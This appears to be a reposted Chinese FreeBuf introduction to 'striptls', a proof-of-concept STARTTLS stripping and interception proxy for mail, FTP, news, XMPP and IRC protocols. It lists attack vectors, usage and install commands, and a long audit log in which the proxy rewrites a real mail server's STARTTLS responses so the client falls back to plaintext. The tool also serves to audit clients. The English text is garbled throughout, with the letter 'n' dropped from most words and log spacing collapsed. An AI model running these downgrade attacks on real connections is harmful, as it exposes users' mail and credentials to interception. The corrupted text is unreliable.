STARTTLS 是对纯文本通信协议的扩展。它提供一种方式将纯文本连接升级为加密连接(TLS或SSL),而不是另外使用一个端口作加密通信。
striptls是一款端口剥离攻击的POC实现
SMTP
SMTP.StripFromCapabilities - server respose capability patchSMTP.StripWithIvalidResposeCode - cliet STARTTLS strippig, ivalid respose codeSMTP.UtrustedItercept - STARTTLS iterceptio (cliet ad server talkig ssl) (requires server.pem i pwd)SMTP.StripWithTemporaryErrorSMTP.StripWithErrorSMTP.ProtocolDowgradeStripExtededModeSMTP.IjectCommadPOP3
POP3.StripFromCapabilitiesPOP3.StripWithErrorPOP3.UtrustedIterceptIMAP
IMAP.StripFromCapabilitiesIMAP.StripWithErrorIMAP.UtrustedIterceptIMAP.ProtocolDowgradeToV2FTP
FTP.StripFromCapabilitiesFTP.StripWithErrorFTP.UtrustedIterceptNNTP
NNTP.StripFromCapabilitiesNNTP.StripWithErrorNNTP.UtrustedIterceptXMPP
XMPP.StripFromCapabilitiesXMPP.StripIboudTLSXMPP.UtrustedIterceptACAP (utested)ACAP.StripFromCapabilitiesACAP.StripWithErrorACAP.UtrustedIterceptIRC
IRC.StripFromCapabilitiesIRC.StripWithErrorIRC.UtrustedIterceptIRC.StripWithNotRegisteredIRC.StripCAPWithNotregisteredIRC.StripWithSiletDrop结果:
- [*] cliet: 127.0.0.1- [Vulerable!] <class striptls.StripWithIvalidResposeCode at 0xffd3138c>- [Vulerable!] <class striptls.StripWithTemporaryError at 0xffd4611c>- [ ] <class striptls.StripFromCapabilities at 0xffd316bc>- [Vulerable!] <class striptls.StripWithError at 0xffd4614c>- [*] cliet: 192.168.139.1- [Vulerable!] <class striptls.StripIboudTLS at 0x7f08319a6808>- [Vulerable!] <class striptls.StripFromCapabilities at 0x7f08319a67a0>- [Vulerable!] <class striptls.UtrustedItercept at 0x7f08319a6870>实例:#> pytho -m striptls --help # from pip/setup.py#> pytho striptls --help # from source / root folderUsage: striptls [optios] example: striptls --liste 0.0.0.0:25 --remote mail.server.tld:25Optios: -h, --help show this help message ad exit -v, --verbose make lots of oise [default] -l LISTEN, --liste=LISTENliste ip:port [default: 0.0.0.0:<remote_port>] -r REMOTE, --remote=REMOTE remote target ip:port to forward sessios to -k KEY, --key=KEY SSL Certificate ad Private key file to use, PEMformat assumed [default: server.pem] -x VECTORS, --vectors=VECTORS Comma separated list of vectors. Use 'ALL' (default) to select all vectors. Available vectors: FTP.StripFromCapabilities, FTP.StripWithError, FTP.UtrustedItercept, IMAP.StripFromCapabilities, IMAP.StripWithError, IMAP.UtrustedItercept, NNTP.StripFromCapabilities, NNTP.StripWithError, NNTP.UtrustedItercept, POP3.StripFromCapabilities, POP3.StripWithError, POP3.UtrustedItercept, SMTP.ProtocolDowgradeStripExtededMode, SMTP.StripFromCapabilities, SMTP.StripWithError, SMTP.StripWithIvalidResposeCode, SMTP.StripWithTemporaryError, SMTP.UtrustedItercept, XMPP.StripFromCapabilities, XMPP.StripIboudTLS, XMPP.UtrustedItercept [default: ALL]安装:1.从pip安装
#> pip istall striptls2.从源安装
#> setup.py istall示例: iboud outboud[iboud_peer]<------------->[liste:proxy]<------------->[outboud_peer/target] smtp-cliet striptls remote/target本地 smtp-cliet -> localhost:8825 (代理)-> mail.gmx.et:25
审计模式:在特定的情况下遍历所有协议并且跟踪违反starttls协议的客户端。你可以选择按Ctrl+C来中止审核并打印结果。
#>pythostriptls--listelocalhost:8825--remote=mail.gmx.et:252016-02-0222:11:56,275-INFO -<Proxy0xffcf6d0cLliste=('localhost',8825)target=('mail.gmx.et',25)>ready.2016-02-0222:11:56,275-DEBUG -*addedtest(port:21 ,proto: FTP):<classstriptls.StripFromCapabilitiesat0xffd4632c>2016-02-0222:11:56,275-DEBUG -*addedtest(port:21 ,proto: FTP):<classstriptls.StripWithErrorat0xffd4635c>2016-02-0222:11:56,275-DEBUG -*addedtest(port:21 ,proto: FTP):<classstriptls.UtrustedIterceptat0xffd4638c>2016-02-0222:11:56,275-DEBUG -*addedtest(port:143 ,proto: IMAP):<classstriptls.StripFromCapabilitiesat0xffd4626c>2016-02-0222:11:56,275-DEBUG -*addedtest(port:143 ,proto: IMAP):<classstriptls.StripWithErrorat0xffd4629c>2016-02-0222:11:56,275-DEBUG -*addedtest(port:143 ,proto: IMAP):<classstriptls.UtrustedIterceptat0xffd462cc>2016-02-0222:11:56,275-DEBUG -*addedtest(port:119 ,proto: NNTP):<classstriptls.StripFromCapabilitiesat0xffd463ec>2016-02-0222:11:56,275-DEBUG -*addedtest(port:119 ,proto: NNTP):<classstriptls.StripWithErrorat0xffd4641c>2016-02-0222:11:56,275-DEBUG -*addedtest(port:119 ,proto: NNTP):<classstriptls.UtrustedIterceptat0xffd4644c>2016-02-0222:11:56,275-DEBUG -*addedtest(port:110 ,proto: POP3):<classstriptls.StripWithErrorat0xffd461dc>2016-02-0222:11:56,275-DEBUG -*addedtest(port:110 ,proto: POP3):<classstriptls.UtrustedIterceptat0xffd4620c>2016-02-0222:11:56,275-DEBUG -*addedtest(port:25 ,proto: SMTP):<classstriptls.StripFromCapabilitiesat0xffd316bc>2016-02-0222:11:56,275-DEBUG -*addedtest(port:25 ,proto: SMTP):<classstriptls.StripWithErrorat0xffd4614c>2016-02-0222:11:56,276-DEBUG -*addedtest(port:25 ,proto: SMTP):<classstriptls.StripWithIvalidResposeCodeat0xffd3138c>2016-02-0222:11:56,276-DEBUG -*addedtest(port:25 ,proto: SMTP):<classstriptls.StripWithTemporaryErrorat0xffd4611c>2016-02-0222:11:56,276-DEBUG -*addedtest(port:25 ,proto: SMTP):<classstriptls.UtrustedIterceptat0xffd4617c>2016-02-0222:11:56,276-DEBUG -*addedtest(port:5222,proto: XMPP):<classstriptls.StripFromCapabilitiesat0xffd464ac>2016-02-0222:11:56,276-INFO -<RewriteDispatchervectors={5222:set([<classstriptls.StripFromCapabilitiesat0xffd464ac>]),110:set([<classstriptls.UtrustedIterceptat0xffd4620c>,<classstriptls.StripWithErrorat0xffd461dc>]),143:set([<classstriptls.StripWithErrorat0xffd4629c>,<classstriptls.UtrustedIterceptat0xffd462cc>,<classstriptls.StripFromCapabilitiesat0xffd4626c>]),21:set([<classstriptls.UtrustedIterceptat0xffd4638c>,<classstriptls.StripFromCapabilitiesat0xffd4632c>,<classstriptls.StripWithErrorat0xffd4635c>]),119:set([<classstriptls.StripWithErrorat0xffd4641c>,<classstriptls.UtrustedIterceptat0xffd4644c>,<classstriptls.StripFromCapabilitiesat0xffd463ec>]),25:set([<classstriptls.StripWithIvalidResposeCodeat0xffd3138c>,<classstriptls.StripWithTemporaryErrorat0xffd4611c>,<classstriptls.StripFromCapabilitiesat0xffd316bc>,<classstriptls.StripWithErrorat0xffd4614c>,<classstriptls.UtrustedIterceptat0xffd4617c>])}>2016-02-0222:12:08,477-DEBUG -<ProtocolDetect0xffcf6eccLprotocol_id=PROTO_SMTPle_history=0>-protocoldetected(targetport)2016-02-0222:12:08,530-INFO -<Sessio0xffcf6e4cL>cliet('127.0.0.1',28902)hascoected2016-02-0222:12:08,530-INFO -<Sessio0xffcf6e4cL>coectigtotarget('mail.gmx.et',25)2016-02-0222:12:08,805-DEBUG -<Sessio0xffcf6e4cL>[cliet]<=[server] '220gmx.com(mrgmx001)NemesisESMTPServiceready\r\'2016-02-0222:12:08,805-DEBUG -<RewriteDispatcher -chagedmagle:striptls.StripWithIvalidResposeCodeew:True>2016-02-0222:12:09,759-DEBUG -<Sessio0xffcf6e4cL>[cliet]=>[server] 'ehlo[192.168.139.1]\r\'2016-02-0222:12:09,850-DEBUG -<Sessio0xffcf6e4cL>[cliet]<=[server] '250-gmx.comHello[192.168.139.1][109.126.64.2]\r\250-SIZE31457280\r\250-AUTHLOGINPLAIN\r\250STARTTLS\r\'2016-02-0222:12:09,851-DEBUG -<Sessio0xffcf6e4cL>[cliet]<=[server][magled]'250-gmx.comHello[192.168.139.1][109.126.64.2]\r\250-SIZE31457280\r\250-AUTHLOGINPLAIN\r\250-STARTTLS\r\250STARTTLS\r\'2016-02-0222:12:09,867-DEBUG -<Sessio0xffcf6e4cL>[cliet]=>[server] 'STARTTLS\r\'2016-02-0222:12:09,867-DEBUG -<Sessio0xffcf6e4cL>[cliet]<=[server][magled]'200STRIPTLS\r\'2016-02-0222:12:09,867-DEBUG -<Sessio0xffcf6e4cL>[cliet]=>[server][magled]Noe2016-02-0222:12:09,883-DEBUG -<Sessio0xffcf6e4cL>[cliet]=>[server] 'mailFROM:<a@b.com>size=10\r\'2016-02-0222:12:09,983-DEBUG -<Sessio0xffcf6e4cL>[cliet]<=[server] '530Autheticatiorequired\r\'2016-02-0222:12:09,992-DEBUG -<Sessio0xffcf6e4cL>[cliet]=>[server] 'rset\r\'2016-02-0222:12:10,100-DEBUG -<Sessio0xffcf6e4cL>[cliet]<=[server] '250OK\r\'2016-02-0222:12:10,116-WARNING -<Sessio0xffcf6e4cL>termiated.2016-02-0222:12:13,056-DEBUG -<ProtocolDetect0xffd0920cLprotocol_id=PROTO_SMTPle_history=0>-protocoldetected(targetport)2016-02-0222:12:13,056-INFO -<Sessio0xffd0918cL>cliet('127.0.0.1',28905)hascoected2016-02-0222:12:13,057-INFO -<Sessio0xffd0918cL>coectigtotarget('mail.gmx.et',25)2016-02-0222:12:13,241-DEBUG -<Sessio0xffd0918cL>[cliet]<=[server] '220gmx.com(mrgmx003)NemesisESMTPServiceready\r\'2016-02-0222:12:13,241-DEBUG -<RewriteDispatcher -chagedmagle:striptls.StripWithTemporaryErrorew:True>2016-02-0222:12:14,197-DEBUG -<Sessio0xffd0918cL>[cliet]=>[server] 'ehlo[192.168.139.1]\r\'2016-02-0222:12:14,289-DEBUG -<Sessio0xffd0918cL>[cliet]<=[server] '250-gmx.comHello[192.168.139.1][109.126.64.2]\r\250-SIZE31457280\r\250-AUTHLOGINPLAIN\r\250STARTTLS\r\'2016-02-0222:12:14,304-DEBUG -<Sessio0xffd0918cL>[cliet]=>[server] 'STARTTLS\r\'2016-02-0222:12:14,305-DEBUG -<Sessio0xffd0918cL>[cliet]<=[server][magled]'454TLSotavailableduetotemporaryreaso\r\'2016-02-0222:12:14,305-DEBUG -<Sessio0xffd0918cL>[cliet]=>[server][magled]Noe2016-02-0222:12:14,320-DEBUG -<Sessio0xffd0918cL>[cliet]=>[server] 'mailFROM:<a@b.com>size=10\r\'2016-02-0222:12:14,411-DEBUG -<Sessio0xffd0918cL>[cliet]<=[server] '530Autheticatiorequired\r\'2016-02-0222:12:14,415-DEBUG -<Sessio0xffd0918cL>[cliet]=>[server] 'rset\r\'2016-02-0222:12:14,520-DEBUG -<Sessio0xffd0918cL>[cliet]<=[server] '250OK\r\'2016-02-0222:12:14,535-WARNING -<Sessio0xffd0918cL>termiated.2016-02-0222:12:16,649-DEBUG -<ProtocolDetect0xffd092ecLprotocol_id=PROTO_SMTPle_history=0>-protocoldetected(targetport)2016-02-0222:12:16,650-INFO -<Sessio0xffd0926cL>cliet('127.0.0.1',28908)hascoected2016-02-0222:12:16,650-INFO -<Sessio0xffd0926cL>coectigtotarget('mail.gmx.et',25)2016-02-0222:12:16,820-DEBUG -<Sessio0xffd0926cL>[cliet]<=[server] '220gmx.com(mrgmx003)NemesisESMTPServiceready\r\'2016-02-0222:12:16,820-DEBUG -<RewriteDispatcher -chagedmagle:striptls.StripFromCapabilitiesew:True>2016-02-0222:12:17,760-DEBUG -<Sessio0xffd0926cL>[cliet]=>[server] 'ehlo[192.168.139.1]\r\'2016-02-0222:12:17,849-DEBUG -<Sessio0xffd0926cL>[cliet]<=[server] '250-gmx.comHello[192.168.139.1][109.126.64.2]\r\250-SIZE31457280\r\250-AUTHLOGINPLAIN\r\250STARTTLS\r\'2016-02-0222:12:17,849-DEBUG -<Sessio0xffd0926cL>[cliet]<=[server][magled]'250-gmx.comHello[192.168.139.1][109.126.64.2]\r\250-SIZE31457280\r\250AUTHLOGINPLAIN\r\'2016-02-0222:12:17,871-WARNING -<Sessio0xffd0926cL>termiated.2016-02-0222:12:20,071-DEBUG -<ProtocolDetect0xffd093ccLprotocol_id=PROTO_SMTPle_history=0>-protocoldetected(targetport)2016-02-0222:12:20,072-INFO -<Sessio0xffd0934cL>cliet('127.0.0.1',28911)hascoected2016-02-0222:12:20,072-INFO -<Sessio0xffd0934cL>coectigtotarget('mail.gmx.et',25)2016-02-0222:12:20,239-DEBUG -<Sessio0xffd0934cL>[cliet]<=[server] '220gmx.com(mrgmx002)NemesisESMTPServiceready\r\'2016-02-0222:12:20,240-DEBUG -<RewriteDispatcher -chagedmagle:striptls.StripWithErrorew:True>2016-02-0222:12:21,181-DEBUG -<Sessio0xffd0934cL>[cliet]=>[server] 'ehlo[192.168.139.1]\r\'2016-02-0222:12:21,269-DEBUG -<Sessio0xffd0934cL>[cliet]<=[server] '250-gmx.comHello[192.168.139.1][109.126.64.2]\r\250-SIZE31457280\r\250-AUTHLOGINPLAIN\r\250STARTTLS\r\'2016-02-0222:12:21,280-DEBUG -<Sessio0xffd0934cL>[cliet]=>[server] 'STARTTLS\r\'2016-02-0222:12:21,281-DEBUG -<Sessio0xffd0934cL>[cliet]<=[server][magled]'501Sytaxerror\r\'2016-02-0222:12:21,281-DEBUG -<Sessio0xffd0934cL>[cliet]=>[server][magled]Noe2016-02-0222:12:21,289-DEBUG -<Sessio0xffd0934cL>[cliet]=>[server] 'mailFROM:<a@b.com>size=10\r\'2016-02-0222:12:21,381-DEBUG -<Sessio0xffd0934cL>[cliet]<=[server] '530Autheticatiorequired\r\'2016-02-0222:12:21,386-DEBUG -<Sessio0xffd0934cL>[cliet]=>[server] 'rset\r\'2016-02-0222:12:21,469-DEBUG -<Sessio0xffd0934cL>[cliet]<=[server] '250OK\r\'2016-02-0222:12:21,485-WARNING -<Sessio0xffd0934cL>termiated.2016-02-0222:12:23,665-WARNING -CtrlC-Stoppigserver2016-02-0222:12:23,665-INFO - --auditresults--2016-02-0222:12:23,666-INFO -[*]cliet:127.0.0.12016-02-0222:12:23,666-INFO - [Vulerable!]<classstriptls.StripWithIvalidResposeCodeat0xffd3138c>2016-02-0222:12:23,666-INFO - [Vulerable!]<classstriptls.StripWithTemporaryErrorat0xffd4611c>2016-02-0222:12:23,666-INFO - [ ]<classstriptls.StripFromCapabilitiesat0xffd316bc>2016-02-0222:12:23,666-INFO - [Vulerable!]<classstriptls.StripWithErrorat0xffd4614c>除了审计模式外还有从服务端剥离starttls、无效化starttls响应、不可行的ssl链接(对于客户端则是不在检验服务端的证书是否可信)以及XMPP的追踪审计的功能。
介绍内容来自FreeBuf黑客与极客(FreeBuf.COM)
评论